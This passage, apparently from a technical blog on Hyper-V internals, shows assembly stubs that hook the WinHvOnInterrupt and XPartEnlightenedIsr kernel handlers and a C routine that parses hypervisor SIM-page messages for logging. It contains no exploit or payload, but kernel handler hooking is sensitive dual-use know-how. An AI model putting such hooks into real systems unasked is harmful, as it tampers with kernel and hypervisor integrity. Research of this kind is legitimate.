<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchmWinHvOnInterrupt </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PROC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mPUSHAD</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">call</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ParseHvMessage</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mPOPAD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,pvWinHVOnInterruptOrig</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">jmp</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchmWinHvOnInterrupt </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ENDP</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchXPartEnlightenedIsr </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PROC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mPUSHAD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">call</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ParseVmbusMessage</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mPOPAD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,pvXPartEnlightenedIsrOrig</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">jmp</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchXPartEnlightenedIsr </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ENDP</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After parsing, control is passed to the original procedures WinHvOnInterrupt and XPartEnlightenedIsr. Note that the mov rdx / jmp rdx tail runs after mPOPAD, so rdx reaches the original handler overwritten; jmp qword ptr [pvWinHVOnInterruptOrig] would hand over every register intact. The parsing function is as follows:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">void</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ParseHvMessage()</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHV_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> phvMessage, phvMessage1;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">get the index of the current logical processor (each one has its own SIM page)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ULONG</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> uCurProcNum = KeGetCurrentProcessorNumberEx(</span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (pvSIMP[uCurProcNum] != </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvMessage = (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHV_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)pvSIMP[uCurProcNum]; </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">} </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">else</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"pvSIMP is NULL"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">return</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">the notification message arrives in SIM slot 1 (SINT1), one HV_MESSAGE_SIZE past the page start</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvMessage1 = (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHV_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)((</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PUINT8</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)pvSIMP[uCurProcNum] + </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_MESSAGE_SIZE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">); </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//for SINT1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (phvMessage1->Header.MessageType != 0){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"SINT1 interrupt"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">call the handler procedure that matches the message type;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//the layout of each message type is described in the TLFS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">switch</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (phvMessage->Header.MessageType)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">case</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HvMessageTypeX64IoPortIntercept:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PrintIoPortInterceptMessage(phvMessage);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">case</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HvMessageTypeNone:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"HvMessageTypeNone"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">case</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HvMessageTypeX64MsrIntercept:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PrintMsrInterceptMessage(phvMessage);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">case</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HvMessageTypeX64CpuidIntercept:</span></div>
